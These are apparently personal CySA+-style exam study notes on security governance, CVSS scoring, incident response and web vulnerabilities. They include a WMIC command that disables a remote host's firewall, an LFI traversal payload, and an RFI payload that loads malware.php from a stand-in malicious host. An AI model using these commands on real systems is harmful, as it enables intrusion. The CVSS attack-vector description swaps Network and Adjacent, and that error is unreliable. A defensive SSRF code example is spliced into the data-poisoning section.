Sec+ Expires August 17, 2025

### 1a Understanding CS leadership concepts

#### SANS policy

https://www.sans.org/information-security-policy/

#### Service Level Objective

SLO: "Cybersecurity service-level objectives (SLOs) are the standards that organizations and their leadership must meet to ensure the security of their network. These objectives help measure and assess how well security operations protect the organization’s assets and assure its customers and stakeholders that systems and data are safe and secure. These objectives must be realistic and achievable, and the organization often reflects the latest security trends and best practices.

Some common security-related SLOs include mean time to detect (MTTD), Mean Time to Recover (MTTR), and time to patch.

Compliance teams depend upon policy documents and SLOs to measure work performance and conformance. Actionable statements can be extracted from policies and used to determine if work is being performed in a compliant manner. Furthermore, when risk managers identify new risks, the expectation is that governance teams will codify responses designed to address them by updating policy. This entire process is dependent upon the written rules established in policy documents!

For example, compliance teams may review patch management activities and report back to risk managers regarding the time between the issuance of a security patch and the time taken to apply it. Risk managers use this data to create a trend report that identifies that “time to patch” has increased steadily over the last several months. In response to this new risk item, risk managers work to determine that several change requests related to security patching had their implementation dates pushed back by department leaders. This information is provided to the governance team, who are responsible for crafting a response.

The governance team’s response might be to establish that any requests to delay security patching require two levels of management approval. The governance team would then codify this decision in the existing change management policy, enabling enforcement."

#### NIST 4 T's - Risk management

- Avoid (terminate)
- Accept (tolerate)
- Mitigate (treatment)
- Transfer (transfer)

Risks need follow up risks

#### Threat modelling

Identifying threat actors, and their TTPs

- MITRE ATT&CK
- Microsoft threat modelling tool

![[Pasted image 20250512105129.png]]

Two-pronged attack via social engineering: usually a prompt is backed up with a follow-up for extra effectiveness. Show a forged badge, or use an urgent voice or email, and follow up with a phone call. Example: an email for 250k, then a deepfake phone call to encourage authorising the payment.

Threat modelling requires:

- knowledge of system components
- knowledge of attack methods
- knowledge of appropriate mitigations
- knowledge of laws and regulations
- knowledge of business impacts

**Collaboration required**

----------

### 1b Control types and methods

#### categories:

- technical: fw, ips/ids, siem, EDR
- operational: change control, access control
- managerial/admin: risk assessments

#### function:

- preventive: ACL, firewall
- detective: CCTV, honeypot, SIEM
- corrective: patch management, backup
- responsive: SOC, CSIRT, CSERT
- compensating: audit

external resources:

- [https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r5.pdf](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r5.pdf) Security & Privacy Controls for Information Systems and Organisations
- [https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-171r3.pdf](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-171r3.pdf) Protecting Controlled Unclassified Information in Non-federal Systems and Organizations
- [https://www.isms.online/information-security/everything-you-need-to-know-about-the-iso-27001-2022-standard-update/](https://www.isms.online/information-security/everything-you-need-to-know-about-the-iso-27001-2022-standard-update/) ISO 27001 Standards
- [https://www.cisecurity.org/controls](https://www.cisecurity.org/controls) CIS Controls

#### Managing Attack Surface

- STIGS Security Technical Implementation Guides - https://public.cyber.mil/stigs/
- CIS benchmarks

##### Footprinting

Footprinting aims to get a more holistic view of a system or network, whereas fingerprinting is more targeted to a specific application or operating system.

Methods of footprinting

Footprinting is the technique used for gathering information about computer systems and the entities they belong to. To get this information, a hacker might use various tools and technologies. This information is very useful to a hacker who is trying to crack a whole system.

- https://web-check.as93.net/
- https://whoxy.com

##### passive recon

Bugbounty reports: https://nored0x.github.io/penetration%20testing/writeups-Bug-Bounty-hackrone/

### 1c patch management

#### configuration management tools:

- chef
- puppet
- ansible
- terraform

### 2a threat actor concepts

- nation-state
- organised crime
- hacktivist
- insider threat
- script kiddie
- supply chain access

### 2b id active threats

indicators of attack (IoAs), and confidence levels provided by threat information data to identify threats, understand exploits, and reveal an attacker’s activities.

- UEBA: User Entity Behavioural Analysis
- Information Sharing and Analysis Centers (ISACs)

#### Honeypots

- [https://blueclouddrive.com/generate](https://blueclouddrive.com/generate) Generate your Canarytoken here
- [https://canarytokens.org/generate](https://canarytokens.org/generate) Canarytokens is a free tool that helps you discover you've been breached by having attackers announce themselves. The tokens allow you to implant traps.
- [https://www.smokescreen.io/](https://www.smokescreen.io/) Deception technology to blanket your network with decoys to catch the serious bad attackers
- [https://www.stationx.net/canarytokens/](https://www.stationx.net/canarytokens/)
- [https://whiteclouddrive.com/generate](https://whiteclouddrive.com/generate)
- [https://d3fend.mitre.org/](https://d3fend.mitre.org/)

#### Exploit databases

https://www.exploit-db.com/

#### Threat Feeds

- Cybersecurity and Infrastructure Security Agency: https://www.cisa.gov/cybersecurity
- NIST Computer Security Resource Center: https://csrc.nist.gov/
- FBI InfraGard: https://www.infragard.org/
- SANS Internet Storm Center: https://isc.sans.edu/
- Virus Total Intelligence: https://www.virustotal.com/gui/intelligence-overview
- Cisco Talos Intelligence: https://www.talosintelligence.com/
- SPAMHAUS: https://www.spamhaus.org/
- Crowdstrike: https://www.crowdstrike.com/products/threat-intelligence/
- AlienVault Open Source Threat Exchange: https://otx.alienvault.com/
- Anomali: https://www.anomali.com/products/threatstream
- Mandiant: https://www.mandiant.com/advantage/threat-intelligence
- Abuse.CH: https://abuse.ch/

### 3a Reviewing system and network architecture concepts

| Subkey Name | Description |
| --- | --- |
| SAM | Security Accounts Manager (SAM) stores username information for accounts used on the current computer |
| SECURITY | Linked to the security database of the domain the current user is logged onto |
| SOFTWARE | Contains settings for software and the Windows operating system |
| SYSTEM | Contains settings for drivers and file systems |
| DEFAULT | Contains settings for the LocalSystem account profile |

Virtualisation:

- type1: ESXI
- type2: VirtualBox
- application virtualisation - thin app
- containerization: includes all necessary components - kernel shared

#### Deperimeterisation / Zero-trust

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-207.pdf

SASE: IAM, SWB, Zero Trust network access

### 3b Exploring identity and access management
Federation - trust another company to manage their account and access our resources

- OpenID
- SAML

Transitive Trust: if A trusts Resource B and Resource B trusts Resource C, then A trusts C

CASB: enable sso, enforce rbac, scan malware, monitor and audit user/device activity

### 3c Data loss prevention

Remediation is the action the DLP software takes when it detects a policy violation. The following remediation mechanisms are typical:

- Alert only—The copying is allowed, but the management system records an incident and may alert an administrator.
- Block—The user is prevented from copying the original file but retains access to it. The user may or may not be alerted to the policy violation, but it will be logged as an incident by the management engine.
- Quarantine—Access to the original file is denied to the user (or possibly any user). This might be accomplished by encrypting the file in place or by moving it to a quarantine area in the file system.
- Tombstone—The original file is quarantined and replaced with one describing the policy violation and how the user can release it again.

Public Key Infrastructure

Public key infrastructure (PKI) provides a suite of tools designed to support public/private key management, integrity checks via digital signatures, and authentication, as well as non-repudiation of users and/or devices through the use of private key encryption. PKI offers the opportunity to centralize digital certificate standards and the methods used to provide cryptographic services. This is important as it helps improve compliance with established policy and/or regulatory requirements relative to cryptography.

PKI provides the mechanisms required to confidently identify the owners of public keys. PKI issues digital certificates guaranteed by a trusted certificate authority (CA). Trusted CAs are preestablished by recording their information within operating system certificate stores, within browsers, and by using special hardware storage components.
Digital certificates are foundational to HTTPS traffic.

Secure Sockets Layer (SSL) Inspection

Secure socket layer (SSL) inspection is the process of inspecting encrypted HTTPS traffic. Without SSL inspection, network administrators cannot monitor encrypted traffic for threats, making HTTPS traffic an easy method for attackers to avoid detection. SSL inspection is also essential for verifying that website certificates are valid, helping protect against on-path (man-in-the-middle) attacks, where an attacker intercepts communications between two parties, and detecting traffic encrypted with anything other than a trusted third-party certificate. SSL inspection also helps enforce organizational policies, ensuring that employees comply with acceptable use policies and do not attempt to access restricted content or share/upload restricted data.

SSL inspection is often accomplished by installing digital certificates on end devices that allow encrypted traffic to be intercepted, decrypted, and inspected by security tools or software before being re-encrypted and forwarded to the intended destination. Web proxies, load balancers, next-gen firewalls, and similar devices all support this capability.
#### Log ingestion

- DEBUG: used for debugging purposes
- INFO: used for informative messages
- WARNING: used to indicate a potential problem
- ERROR: used to indicate a serious problem
- CRITICAL: used to indicate a critical problem

### 4a Process improvement in security operations

- SIEM and SOAR
- Playbooks and runbooks
- MISP: https://www.misp-project.org/
- Single pane of glass
- webhook and API
- Plugins and apps

### 5a Compliance requirements

ISO / NIST, Legal contracts

PCI DSS AoC (attestation of compliance) - doc that demonstrates an org's compliance, produced by a QSA (quality security assessor) or Merchant

Capability Maturity Model Integration (CMMI)

Capability Maturity Model Integration (CMMI) describes five levels of maturity within the operational or software capabilities of an organization. Measuring software capabilities is the most common use, and this assessment is frequently required by many federal contracts. A CMMI assessment is very focused on identifying that all work is defined through well-established processes. The results of the assessment will establish the maturity level, or score, of an organization. The scores include the following:

- Level 1: Initial—Processes do not exist, and work is reactive in nature.
- Level 2: Managed—Many work activities are defined via processes, but work is still frequently reactive in nature.
- Level 3: Defined—The majority of work is well defined via processes, and proactive measures are in place.
- Level 4: Quantitatively Managed—All work is well defined via processes, proactive measures are in place, and the work outputs are tracked and analyzed.
- Level 5: Optimizing—Work is well defined via processes

Cloud security alliance STAR - assessment

owasp

- [https://owasp.org/www-project-webgoat/](https://owasp.org/www-project-webgoat/)
- [https://owasp.org/www-project-juice-shop/](https://owasp.org/www-project-juice-shop/)
- Try Hack Me Room Owasp top 10 [https://tryhackme.com/room/owasptop10](https://tryhackme.com/room/owasptop10)
- Try Hack Me Room Owasp Juice Shop [https://tryhackme.com/room/owaspjuiceshop](https://tryhackme.com/room/owaspjuiceshop)
- [https://owasp.org/www-community/Vulnerability_Scanning_Tools](https://owasp.org/www-community/Vulnerability_Scanning_Tools)
- [https://owasp.org/www-project-web-security-testing-guide/](https://owasp.org/www-project-web-security-testing-guide/)
- [https://owasp.org/www-project-proactive-controls/](https://owasp.org/www-project-proactive-controls/)
- [https://github.com/OWASP/wstg/tree/master/document](https://github.com/OWASP/wstg/tree/master/document)
- OWASP Testing guide very extensive [https://owasp.org/www-project-web-security-testing-guide/](https://owasp.org/www-project-web-security-testing-guide/)

GDPR latest changes:

Preparing for 2025: Key Compliance Areas for Businesses - UK GDPR: UK and EU compliance 2025

1. Legitimate Interest Assessments (LIAs)
   - Integral to data processing under UK and EU GDPR.
   - Conduct LIAs reflecting nuanced differences post-Brexit.
   - Key components of an LIA:
     - Clearly outline the legitimate interest.
     - Demonstrate necessity of data processing.
     - Prove data subject’s rights do not override these interests.
   - Regularly review LIAs to align with regulatory updates.
2. Data Transfer Impact Assessments (DTIAs)
   - Essential for cross-border data transfers post-Brexit.
   - Evaluate protections for personal data transferred outside UK/EU.
   - Consider frameworks like the Data Privacy Framework for UK-US transfers.
   - Stay prepared for potential legal status changes.
3. Data Protection by Design and Default
   - Integrate data privacy measures into all business processes.
   - Conduct regular Data Privacy Impact Assessments (DPIAs) for high-risk activities.
   - Ensure only necessary data is processed and access is limited.
   - Align activities with GDPR principles.
4. Maintaining Records of Processing Activities (RoPAs)
   - Mandatory for significant or high-risk data processing.
   - Provide a clear picture of the data lifecycle.
   - Regularly update RoPAs to reflect evolving guidelines.

### 5b Understanding vuln scanning methods

Dynamic analysis includes using vulnerability scanning software to identify vulnerabilities and, in a more vigorous approach, penetration testing. A dynamic analysis approach requires evaluation of a system or software while it is running. Evaluation tasks may be manual interactions with the features and functions that comprise the system, application, or interactions that leverage the power of specialized tools; for example, using Burp Suite to carefully observe, control, and/or manipulate the data moving between the browser and application.

### 5c Exploring Special considerations in Vuln scanning

Operational technology (OT): ICSs, SCADA, PLC

A supervisory control and data acquisition (SCADA) system takes the place of a control server in large-scale, multiple-site ICSs. SCADA typically run as software on ordinary computers, gathering data from and managing plant devices and equipment with embedded PLCs, referred to as field devices. SCADA typically use WAN communications, such as cellular or satellite, to link the SCADA server to field devices.
### 6a Understanding Vulnerability Scoring Concepts

SCAP, CVSS, vuln validation, context

#### SCAP languages

Security Content Automation Protocol defined by STIG https://public.cyber.mil/stigs/scap/

standardise identification for flaws in software, misconfig, and vulns

- OVAL: Open vuln and assessment language. Consistent interpretation of vulns
- ARF: Asset reporting format - [https://oval.mitre.org/](https://oval.mitre.org/) info about assets
- XCCDF: Extensible configuration checklist description format - https://csrc.nist.gov/files/pubs/ir/7275/r4/upd1/final/docs/nistir-7275r4_updated-march-2012_clean.pdf Benchmarks

#### SCAP id schemes

- CPE - Common Platform Enumeration: URI like id for software and software
- CVE - Common vuln and exposure
- CCE - configuration
- CVSS scoring

> [!NOTE] 4 approx. questions on exam for CVSS
> Calculate CVSS score

##### CVSS v2, v3, v4

https://www.first.org/cvss/

score from 0 - 10

| Score | Rating |
| --- | --- |
| 0 | None |
| 0.1+ | Low |
| 4.0+ | Medium |
| 7.0+ | High |
| 9.0+ | Critical |

###### CVSS Metrics v3.1

**Attack Vector (AV)** - Physical (P), Local (L), Adjacent network (A), or Network (N)

The physical attack vector includes physical access to the system, such as accessing the device in person. The local attack vector consists of the ability to manipulate the system with local access, such as by using a USB-connected device. The network attack vector includes two distinct categories: adjacent network and network. Network (N) describes access via the same broadcast domain, whereas Adjacent network (A) refers to connectivity from any location. Network attacks include access to a system via the network, and include actions such as sending malicious data packets or instructions. The attack vectors help organizations identify the best way to implement protections.

**Attack Complexity (AC)** - High (H) or Low (L)

Refers to the difficulty of the attack techniques used by a threat actor. Low indicates a straightforward attack, and high indicates a more complicated attack. Attack complexity is important to consider when evaluating the risk posed by a vulnerability. If the attack complexity is high, it may be difficult or impossible for a threat actor to exploit the vulnerability, thus reducing the risk. On the other hand, if the attack complexity is low, the risk posed by the vulnerability is greater.

**Privileges Required (PR)** - None (N), Low (L), or High (H)

This represents permissions such as guest or anonymous (N), standard user (L), and administrator (H).

**User Interaction (UI)** - None (N) or Required (R)

Whether an exploit of the vulnerability depends on some local user action, such as executing a file attachment.

**Scope (S)** - Unchanged (U) or Changed (C)

This indicates whether the exploit affects only the local security context (U) or not (C). For example, a hypervisor vulnerability might allow an exploit from one VM to other VMs.

**Confidentiality (C), Integrity (I), and Availability (A)** - High (H), Low (L), or None (N)

Where the metrics above assess exploitability, these three separate metrics measure impacts to the CIA triad.

### 7A effective communication concepts

#### Vuln management reporting

- org aware of risks of IT infrastructure
- Simple summaries of existing vulnerabilities
- details remediation steps

#### Regulatory compliance reports

Prepared by qualified personnel and often include information on policies and procedures

#### internal compliance reports

include assessments of endpoints to validate configuration per required baselines

#### KPI

Incidents, detection times, indicators of compromise, threats, risk assessment, resource allocations

cons: incidents are subjective, fps, inaccurate cs landscape data, irrelevant data, KPI based decision-making is complicated.
#### SLO

customer oriented operations - provide benchmark by which security operations can measure their performance

### 7b vuln reporting outcomes and action plans

- establish policies
- training
- compensating controls

#### MoU

Memorandum of Understanding is a legal document that outlines the terms and conditions of an agreement between two or more parties. It is an agreement that is not legally binding but serves as a document of understanding and good faith among the parties involved. A memorandum of understanding usually outlines the agreement’s objectives and each party’s duties and responsibilities.

#### SLA

legally binding contract between parties

### 8a understand incident response activities

Plan, guidelines, resources, protocols, minimise impact

prep, detection/analysis, contain, eradicate/recovery, post-incident

- policies - systems of org expectation and procedures for responding to security incidents
- procedures - orgs actions during incident response
- assessment of potential impacts - risk analyses and impact measure scope of identified incidents

Playbooks: https://www.gov.scot/publications/cyber-resilience-incident-management/

Communication Plan - A secure method of communication between the IR team members is essential for successfully managing incidents. The team may require “out-of-band” or “off-band” channels that attackers cannot intercept. In a major intrusion incident, using corporate email or VoIP runs the risk that the adversary can intercept communications. One obvious method is via smartphones, but ideally, the messaging system should support end-to-end encryption, digital signatures, and encryption keys supplied by a system independent of the identity and access management systems used by the attacked environment.
#### Tabletop exercise resource

- https://www.ncsc.gov.uk/section/exercise-in-a-box/overview
- [https://www.thecyberfish.com/](https://www.thecyberfish.com/)
- [https://circadence.com/](https://circadence.com/)
- https://irgame.ai/

#### post incident

lesson learned report (LLR) or after-action report (AAR).

#### BCDR

Business continuity and Disaster recovery

- BC: keep business running
- DR: part of DR and immediate efforts

### 8b perform incident response activities

#### Forensics

- chain of custody
- identification
- collection
- analysis
- reporting/presentation
- legal hold - keep data pending legal case
- eDiscovery - email, logs, text, voicemail discovered via legal hold
- immediate impact - fines, costs of assets

### 9a understanding incident response comms

persons, group or org that can affect or be affected by a particular incident

Incidents impact stakeholders, and their areas of responsibility may be shaped by their knowledge of the incident. Keeping stakeholders informed helps them manage their responsibilities (affected by the incident) and often reveals information the responders may not have previously known, such as alternative processes, business relationships, impacts, and consequences.

### 9b analysing incident response activities

autopsy - analyse forensic image: [Autopsy - Digital Forensics](https://www.autopsy.com/)

### 10a Identifying malicious activity

- pcap samples
- domains https://www.whoxy.com/

### 10b attack methodology frameworks

Security Testing: https://www.isecom.org/OSSTMM.3.pdf

killchain: weaponisation, delivery, exploit, installation, cc, actions

diamond model - analyse an intrusion event

![[Pasted image 20250515112908.png]]

```
E = { {Adversary,Cadversary},
      {Capability,Ccapability},
      {Infrastructure,Cinfrastructure},
      {Victim,Cvictim} = { {IP,Cip},
                           {Port,Cport},
                           {Process,Cprocess} },
      {Timestamp,Ctimestamp},
      { ... } }
```

![[Pasted image 20250515113046.png]]

![[Pasted image 20250515113123.png]]

#### Maltego

Visualisation alternative: https://github.com/HuronOsint/OsintDistro

### 12a analysing web vulns

- burp suite
- OWASP ZAP (zed attack proxy) [https://www.zaproxy.org/docs/guides/zapping-the-top-10-2021/](https://www.zaproxy.org/docs/guides/zapping-the-top-10-2021/)
- Nikto - web scanner https://www.cirt.net/Nikto2
- Arachni - web scanner (new name: SCNR) [GitHub - Arachni/arachni: Web Application Security Scanner Framework](https://github.com/Arachni/arachni?tab=readme-ov-file) [Ecsypno Single Member P.C. – R&D and Consulting](https://ecsypno.com/)
- Immunity Debugger - analysis, reverse engineer software
- GNU Debugger - analysis, reverse engineer software

### 12b analyse cloud vulns

- ScoutSuite - audit tool github.com/nccgroup/ScoutSuite
- Prowler - audit tool github.com/toniblyx/prowler
- Pacu - exploit framework github.com/RhinoSecurityLabs/pacu
- rhinosecuritylabs.com/aws/cloudgoat-vulnerable-design-awsenvironment

### 13a understanding scripting languages

- ksh - unix ibm
- sh - bourne shell
- csh - c shell, unix oracle
- tcsh - C shell, improved c shell
- bash - bourne again shell, improved sh
- zsh - z shell, expands on bash shell

##### Common:

- `cat`: Display the content of a file.
- `tail`: Display the last 10 lines of a file.
- `head`: Display the first 10 lines of a file.
- `touch`: Create an empty file.
- `mkdir`: Create a directory.
- `cp`: Copy a file (or directory).
- `mv`: Move an object, such as a file. Also used to rename files and directories.
- `rm`: Remove a file or directory.
- `file`: Determine the type of a file.
- `ls`: Display the contents of a directory.
- `locate`: Search for files. Locate uses a database to improve speed and efficiency of searches.
- `find`: Search for files by parsing the file system.
- `wget`: Simple command to retrieve content from an HTTP server.
- `curl`: Similar to wget but includes more sophisticated options.

###### admin:

- `vi`/`vim`: A file editor for use in a terminal. Very popular but nonintuitive to use.
- `su`: Substitute or switch user.
- `sudo`: Precedes a command that requires elevated privileges.
- `useradd`: Create a user account
- `usermod`: Change the attributes of a user account.
- `chmod`: Change the read, write, execute attributes of a file or directory.
- `chown`: Change permissions on a file or directory.
- `mkfifo`: Similar in concept t

###### arithmetic:

- `+` Addition
- `-` Subtraction
- `*` Multiplication
- `/` Division
- `%` Modulus

##### operators:

- `==` Is equal to
- `!=` Is not equal to
- `-eq` Alternative form of “is equal to”
- `-ne` Alternative form of “is not equal to”
- `-gt` Greater than
- `-lt` Less than
- `-ge` Greater than or equal to
- `-le` Less than or equal to

#### Powershell

#### WMIC

Windows Management Instrumentation Command-Line (WMIC) is a powerful command line tool for performing administrative tasks and is well suited to scripting and automation. WMIC is part of the Windows Management Instrumentation (WMI) framework. It allows administrators to query, configure, and manage various system components, such as the operating system, hardware, and services. It also provides access to hardware and software information and can be used to manage and deploy applications remotely.

The power and versatility of WMIC also makes it a valuable tool for attackers. One popular capability of WMIC is `process call create`, which allows an authenticated user to start a command on a remote host. This example uses WMIC to issue a command on the remote host 10.0.2.6 to disable the Windows Firewall:

```
wmic /node:10.0.2.6 /user:Administrator /password:CySAisC00L! process call create "cmd.exe /c netsh advfirewall set allprofiles state off"
```

#### Python

#### RegEx

#### JSON

#### XML

### 13b id malicious activity through analysis

Event - Description

- Unusual network traffic - This can include unexpected spikes in network activity, communication with unfamiliar IP addresses, or unusual data flow patterns, which may indicate data exfiltration or command and control (C2) activity.
- Unexpected files or processes - This can include the appearance of unknown files or processes on a system, which may indicate malware or an attacker with access to a system.
- Unexpected communication - This can include unexpected communication between applications and systems, which may indicate attempts to exploit vulnerabilities, establish a C2 channel, or exfiltrate data.
- Communication with suspicious IP addresses - This can include communication with IP addresses that are known to be associated with malware, phishing campaigns, or other cyberattacks.
- Unusual communication protocols - This can include unusual communication protocols not typically used in the environment, which may indicate attempts to bypass security measures or establish a C2 channel.
- Large data transfers - This can include the transfer of large amounts of data to external IP addresses, which may indicate data exfiltration or the theft of sensitive data.
- Communication during unusual times - This can include communication during unusual hours or outside of normal business hours, which may indicate attempts to evade detection.
- Communication with suspicious domains - This can include contact with domains that are known to be associated with phishing campaigns, cyberattacks, or domains that have been recently registered.
- Encrypted communication - This can include encrypted or obfuscated communication, which may indicate attempts to hide malicious activity from security personnel.

### 14a exploring secure software dev practices

SSDLC

- NIST Secure Software Development Framework - https://csrc.nist.gov/Projects/ssdf
- Synopsys Secure SDLC 101 - https://www.synopsys.com/blogs/software-security/secure-sdlc/
- Microsoft SDL Practices - https://www.microsoft.com/en-us/securityengineering/sdl/
- Palo Alto: What Is Secure Software Development Lifecycle (Secure SDLC)? - https://www.paloaltonetworks.com/cyberpedia/what-is-secure-softwaredevelopment-lifecycle
- OWASP testing guide https://owasp.org/www-project-web-security-testing-guide/

Auth attack:

- on-path
- password spray
- cred stuff

### 14b recommending controls to mitigate successful app attacks

The heap is an area of memory allocated by the application during execution to store a variable. The heap can be used to store larger amounts of data than the stack, and variables are globally accessible to the process. A heap overflow can overwrite those variables and possibly allow arbitrary code execution. An example is a known vulnerability in Microsoft’s GDI+ processing of JPEG images https://kb.cert.org/vuls/id/297462. Also, management of objects in the heap is dependent on the process that created the object. Failing to de-allocate memory can cause a memory leak.

An integer overflow is a type of software vulnerability that occurs when a program tries to store an integer value larger than the maximum value that the data type can hold, causing the value to wrap around to a lower value or overflow into adjacent memory space. This can cause the program to behave unpredictably, resulting in a security vulnerability if the overflowed value is used in a sensitive calculation or security check.

Buffer overflow is a software vulnerability where a program attempts to write more data to a buffer (a temporary storage area in memory) than it can hold, causing the excess data to overflow into adjacent memory space. This can cause the program to crash or behave unpredictably. In some cases, it can be exploited by an attacker to execute arbitrary code or take control of the affected system.

#### LFI

In local file inclusion (LFI), the attacker adds a file to the web app or website that already exists on the hosting server. This is often accomplished on servers that are vulnerable to directory traversal; the attacker navigates through the server’s file structure and executes a file.
As in the directory traversal example, an attacker could gain control over the server by opening a command prompt. A common tactic used in LFI is introducing a null character (`%00` in URL encoding) at the end of the request to bypass security mechanisms that automatically add a .php suffix to the request. This enables the attacker to access non-PHP files:

```
/webpage.php?FONT=../../Windows/system32/cmd.exe%00
```

#### RFI

In remote file inclusion (RFI), the attacker executes a script to inject a remote file into the web app or website. An attacker could, for instance, force a parameter in a web page to call an external malicious link which includes the compromised file. As an example, consider a page built in PHP that does not properly filter arbitrary values added to page parameters. The PHP code includes a FONT parameter which has five different options, each one a different font type. The attacker can manipulate this parameter to inject an option that isn’t one of these five—and not only that, the attacker can point to an external URL that contains a malicious PHP file:

```
/webpage.php?FONT=http://www.malice.foo/malware.php
```

### SSRF

Server-side request forgery (SSRF) describes a type of web application security vulnerability that occurs when an attacker can send unauthorised requests from a vulnerable web application to other internal or external systems to gain unauthorised access. SSRF typically involves an attacker exploiting the web application’s ability to send HTTP requests to other systems, which are then abused to instruct “hidden” internal or external systems to provide the attacker with access to protected features or to steal information.

https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html

Demo: https://www.hacksplaining.com/exercises/ssrf

PortSwigger (the maintainers of Burp Suite) have published an excellent technical overview of SSRF.
https://portswigger.net/web-security/ssrf

A well-documented example of SSRF occurred in the 2019 Capital One breach. https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/

Some common techniques used to exploit SSRF vulnerabilities include the following:

- An attacker uses SSRF to access internal resources on a network, such as databases or file systems, that should be inaccessible directly from the Internet.
- An attacker can use SSRF to access other web applications to steal data or launch attacks against other systems.
- An attacker can use SSRF to scan the internal network for open ports or other vulnerable services, which are used to launch further attacks.

To prevent SSRF vulnerabilities, web application developers should consider the following:

- Always validate user input—Ensure that all user input is properly validated and sanitised to prevent attackers from manipulating requests.
- Allowed (formerly known as whitelist) hosts—Web applications should only be allowed to access trusted hosts and block all other requests by default.
- Firewall and network segmentation—Network segmentation can prevent unauthorised access to internal systems when combined with firewalls to block traffic from unauthorised sources.
- Secure coding practices—Developers should follow secure coding practices, such as using well established and trusted libraries, avoiding user-controlled data in requests, and implementing safe configuration settings.

### Data poisoning

Data poisoning is an attack that involves deliberately manipulating or corrupting data used in machine learning (ML) models or artificial intelligence (AI) systems. The goal of a data poisoning attack is to undermine the accuracy and reliability of the ML model and potentially cause harm or damage by making the model provide incorrect or biased results.
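Going back to the SSRF prevention list above (validate input, allowed hosts, block everything else by default): the following is an added example, not part of the original notes, of an outbound-URL check in Python. The host names, port policy and DNS answers are constructed for illustration, and the injectable `resolver` parameter is an assumption made so the code runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed allowlist for illustration; a real one comes from configuration.
ALLOWED_SCHEMES = {"https"}
ALLOWED_HOSTS = {"images.example.com", "api.partner.example"}
ALLOWED_PORTS = {443}


class SSRFBlocked(ValueError):
    """The URL must not be fetched on the user's behalf."""


def system_resolver(host, port):
    """Return the IP strings the OS would connect to for host:port."""
    infos = socket.getaddrinfo(host, port, type=socket.SOCK_STREAM)
    return sorted({info[4][0] for info in infos})


def is_internal(ip_text):
    """True for loopback, private, link-local and other non-public ranges."""
    addr = ipaddress.ip_address(ip_text)
    # ::ffff:10.0.0.1 style addresses carry an IPv4 target inside IPv6.
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_reserved or addr.is_multicast or addr.is_unspecified)


def check_outbound_url(url, resolver=system_resolver):
    """Default-deny check; returns (host, port, ips) the caller may connect to."""
    try:
        parts = urlsplit(url)
        port = parts.port if parts.port is not None else 443
    except ValueError as exc:  # malformed authority or port
        raise SSRFBlocked(f"unparseable URL: {exc}") from exc
    if parts.scheme not in ALLOWED_SCHEMES:
        raise SSRFBlocked(f"scheme not allowed: {parts.scheme!r}")
    if parts.username is not None or parts.password is not None:
        raise SSRFBlocked("userinfo in URL not allowed")
    host = (parts.hostname or "").rstrip(".")
    if host not in ALLOWED_HOSTS:
        raise SSRFBlocked(f"host not on allowlist: {host!r}")
    if port not in ALLOWED_PORTS:
        raise SSRFBlocked(f"port not allowed: {port}")
    # An allowlisted name can still point inward (stale record, DNS rebinding):
    # check every address, then connect to these IPs without re-resolving.
    ips = resolver(host, port)
    internal = [ip for ip in ips if is_internal(ip)]
    if not ips or internal:
        raise SSRFBlocked(f"{host} resolves to {internal or 'nothing'}")
    return host, port, ips


# Constructed DNS answers so the example runs offline.
FAKE_DNS = {
    "images.example.com": ["93.184.216.34"],
    "api.partner.example": ["10.0.5.17"],  # allowlisted name, internal target
}


def verdict(url):
    """'allow' or 'block: <reason>' using the constructed DNS answers."""
    try:
        check_outbound_url(url, resolver=lambda h, p: FAKE_DNS.get(h, []))
        return "allow"
    except SSRFBlocked as exc:
        return f"block: {exc}"


if __name__ == "__main__":
    for sample in ("https://images.example.com/a.png", "https://api.partner.example/v1"):
        print(sample, "->", verdict(sample))
```

Redirects need the same check on every hop, so the HTTP client that performs the fetch should have automatic redirect following turned off.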
Some strategies designed to mitigate the risk of data poisoning attacks include the following:

- Data Validation—Before using data in an ML model, it is crucial to validate the quality and authenticity of the data to identify malicious or corrupted inputs that could result in a data poisoning attack.
- Data Diversity—Using a diverse range of data can help prevent data poisoning attacks by making it more difficult to manipulate the inputs to modify the results.
- Anomaly Detection—Using anomaly detection techniques can help identify unusual data patterns that may indicate a data poisoning attack.
- Robust Models—Creating ML models resilient to unexpected inputs and adversarial attacks can help mitigate the risk of data poisoning.
- Regular Model Testing and Auditing—Regularly testing and auditing ML models can help to identify issues and vulnerabilities, including evidence of data poisoning attacks.

Data Poisoning Examples

- Amazon Rekognition System—Researchers demonstrated a data poisoning attack on Amazon’s Rekognition facial recognition system by subtly changing a small percentage of the images used to train the system. They were able to cause the system to misidentify individuals in real world scenarios.
- Google Maps—Researchers showed that by submitting many fake edits to Google Maps, they could manipulate the search results for a particular location. By making small changes to the location’s data, such as changing its name or address, they could push it higher up in search results or even make it disappear altogether.
- Spam Filters—Researchers showed that inserting specific words into legitimate emails could bypass the spam filters used by popular email services like Gmail and Outlook.
  By doing so, they could send spam emails that would appear in users’ inboxes without being flagged as spam.

### 14c Implementing Controls to Prevent Attacks

![[Pasted image 20250516134011.png]]

---

portswigger labs https://portswigger.net/web-security/all-labs#

Hacksplaining [Lessons](https://www.hacksplaining.com/lessons)

phishing

[https://github.com/trustedsec/social-engineer-toolkit](https://github.com/trustedsec/social-engineer-toolkit) and Gophish [https://getgophish.com/](https://getgophish.com/). The Social-Engineer Toolkit offers many capabilities, such as creating a legitimate-looking web page or creating malicious attachments, whereas Gophish is more focused on providing a user-friendly graphical interface and tools for managing campaigns.

- [https://surbl.org/](https://surbl.org/) Intelligence and reputation services covering spam and abuse sites, phishing, malware, and cracked sites.
- [https://dnstwist.it/](https://dnstwist.it/) Phishing domain scanner. Wondering if threat actors created phishing domains to masquerade as an online service or property? Search the original domain or brand name etc.
- [https://github.com/0xDanielLopez/phishing_kits](https://github.com/0xDanielLopez/phishing_kits) Exposing phishing kits seen from [phishunt.io](http://phishunt.io/)
